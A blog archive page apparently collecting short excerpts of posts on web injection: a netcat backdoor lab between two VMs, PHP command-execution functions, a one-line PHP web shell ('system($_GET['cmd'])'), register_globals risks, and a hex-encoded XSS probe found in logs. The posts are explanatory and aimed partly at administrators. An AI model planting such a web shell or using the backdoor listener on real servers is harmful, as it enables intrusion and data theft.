Archive for the ‘Injection’ Category
playing with a backdoor
Filed under: Information, Injection, tools | Tags: backdoor, linux, netcat, ngrep, security, server
Leave a Comment I played last night with a backdoor shell that I found on the net and will show you how this works and how you can find traces if you are the system administrator.
I used 2 vm’s (virtual machines), both based on Debian/Linux one called “victim” it simulates the cracked server where the backdoor runs and the other box called “hacky” where the bad guy is sitting in front :)
The first step of the bad guy is to start a server that listens on some port (12345) on his box, a good program for this is netcat, the command could be something like: netcat -l -p 12345
System call injection
Filed under: Injection, PHP, Security | Tags: escapeshellarg, escapeshellcmd, exec, Injection, PHP, shell, system
Comments (1) With the follow commands you can execute an external program on the system (server).
- shell_exec
- proc_open
- system
- exec
- passthru
- popen
- “ (back tick operator)
This form sends a domain name and prints the result back from the linux program whois.
What does a phpshell look like?
Filed under: Injection, PHP, RFI | Tags: Injection, PHP, phpshell, remotefile, RFI, security, shell, system
Leave a Comment After my last posting “(evil) Register Globals (on)“, I got an email asking what remote files look like and what they do. I call remote files “phpshells”. phpshells can send commands directly to the server system over http.
An easy version could be using a GET variable for a system call. Indeed, it’s enough to steal information, destroy pages and do other nasty stuff on a web server.
system($_GET['cmd']);
?>
The r57shell is the deluxe version of a phpshell. I added some pictures below. It’s an interface and has functions like ftp, mail and many more.
(evil) Register Globals (on)
Filed under: Injection, LFI, RFI | Tags: bypass, Injection, LFI, PHP, register_globals, RFI, security
Comments (2) The register_globals directive is enabled (register_globals = On) by default in PHP versions 4.2.0 and greater in the php config (php.ini). While it doesn’t represent a security vulnerability, it’s a security risk.
Why is it a security risk? Let’s look at this example:
Cheating with obfuscation
Filed under: Injection, PHP, XSS | Tags: hex, hexcode, Injection, logfile, PHP, security, urldecode, XSS
Leave a Comment Sometimes I find strange lines in my webservers log, like this one:
“GET site.php?id=%3C%73%63%72%69%70%74
%3E%61%6C%65%72%74%28%32%33%29%3B%3C
%2F%73%63%72%69%70%74%3E HTTP/1.1″
Whats that? No it’s not the matrix it looks like someone tried to obfuscate something with Hex.
Let’s write 2 lines using urldecode() to check this string.
